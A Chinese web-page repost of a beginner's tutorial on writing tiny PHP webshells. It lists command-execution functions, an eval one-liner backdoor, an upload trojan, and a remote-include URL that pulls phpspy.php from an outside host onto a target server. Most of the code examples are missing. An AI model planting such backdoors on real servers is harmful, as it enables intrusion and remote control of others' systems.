All articles| All Pictures| All Softwares| All Video| Go home page| Write articles| Upload pictures

Reading number is top 10 articles
在ASP.NET,Atlas中调用Web,Service—直接在ASPX页面上暴露Web,Metho_[Asp.Net教程]
Linux系统下PhpMyAdmin目录的安全管理_php资料_编程技术
在ASP.NET程序中运用JavaScript_[Asp.Net教程]
最近收集的有用的Javscript小技巧_JavaScript技术_编程技术
C#文件处理技术:FileStream使用方法
使用PHP,5.0,轻松解析XML文档_php资料_编程技术
在ASP.NET中创建安全web站点_[Asp.Net教程]
ASP.NET,Atlas简单控件介绍之界面控件_[Asp.Net教程]
用php简单实现Search,Engine,Friendly的URL_php资料_编程技术
创建表头固定,表体可滚动的GridView_[Asp.Net教程]
Reading number is top 10 pictures
From China fortress sora aoi3
哥斯达黎加的门将是如何练成的
The woman fight much more than men
这才是真正的人体艺术5
Terrorist smile the largest human history an explosion1
各种囧况!玩游戏最不喜欢出现的十件事(点评)
China telecom 114 spokesman MeiYanXu2
Park waits to have her picture taken exposed
The money of more than 100 countries and regions10
The real super beauty3
Download software ranking
Boxer vs Yellow2
Call Of Duty5
Tram sex maniac 2 (H) rar bag11
I'm come from Beijing1
Boxer's Top ten classic battle9
少妇苏霞全本
C语言教程TXT
linux初级教程
The Bermuda triangle3
株洲本地在线棋牌游戏
aaa published in(发表于) 2013/12/27 20:10:46 Edit(编辑)
黑客教程系列之微型PHP木马的探讨_php资料_编程技术

黑客教程系列之微型PHP木马的探讨_php资料_编程技术

黑客教程系列之微型PHP木马的探讨_php资料_编程技术-你的首页-uuhomepage.com
【编辑提示】:此文仅供参考学习之用!
本文没有什么特别之处,仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。
PHP语法的强大是ASP望尘莫及的,仅一个:就可以刺探整个服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密,我还没想到,但是对于写一个微型PHP木马,我想还是很难被杀的。
这里简单探讨一下几个函数可以作为木马的使用:
1. 可以运行外部命令的几个函数:system,passthru,exec,shell_exec,popen。
例:只要将等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了,所以一般虚拟主机的设置也会将这些函数屏蔽的。
2.还记得WDB论坛的style.php的漏洞吗?我们可以利用这个做个很难被杀的小木马。如下:

将其保存为1.php,我们就可以调用其他不支持php服务器里的.php木马(如phpspy.php)来达到我们的目的:http://target.com/1.php? Include=http://www.xxx.com/phpspy.php
这里http://www.918x.com是不支持php的,否则将会在http://www.xxx.com这台服务器运行phpspy.php,而不是目标服务器。
3. 这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马,我没有改: 将其保存为up.php后,在本地提交表单:

就可以把大个的php木马上传上去。
4. 我一直在想有没有同冰狐浪子的那个ASP一句话木马一样通过本地表单提交运行的PHP木马。终于找到了函数:eval,在PHP4中文参考手册上它的语法说明:
语法:


void eval(string code_str);
内容说明:本函数可将字符串之中的变量值代入,通常用在处理数据库的资料上。参数 code_str 为欲处理的字符串。值得注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。
我们可以在目标主机上保存:为一个PHP文件(我想也可以插在PHP任意文件里)。然后通过本地提交来达到目的,但与ASP不同的是,在magic_quotes_gpc = on的时候,过滤的很多的字符,使得这个使用功能大大的缩小。
对于这个PHP木马本地表单我做了很多次,还没有成熟的代码。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP木马是无须质疑的。
PS:写完后,有人告诉我,其实高手早就有微型的PHP木马了,只是没有公开。哎,我好郁闷啊,研究的都是人家早就有了的成果。不管怎么样,和大家分享一下我的研究,希望能得到帮助和指教。




添加到del.icio.us 添加到新浪ViVi 添加到百度搜藏 添加到POCO网摘 添加到天天网摘365Key 添加到和讯网摘 添加到天极网摘 添加到黑米书签 添加到QQ书签 添加到雅虎收藏 添加到奇客发现 diigo it 添加到饭否 添加到飞豆订阅 添加到抓虾收藏 添加到鲜果订阅 digg it 貼到funP 添加到有道阅读 Live Favorites 添加到Newsvine 打印本页 用Email发送本页 在Facebook上分享


Disclaimer Privacy Policy About us Site Map

If you have any requirements, please contact webmaster。(如果有什么要求,请联系站长)
Copyright ©2011-
uuhomepage.com, Inc. All rights reserved.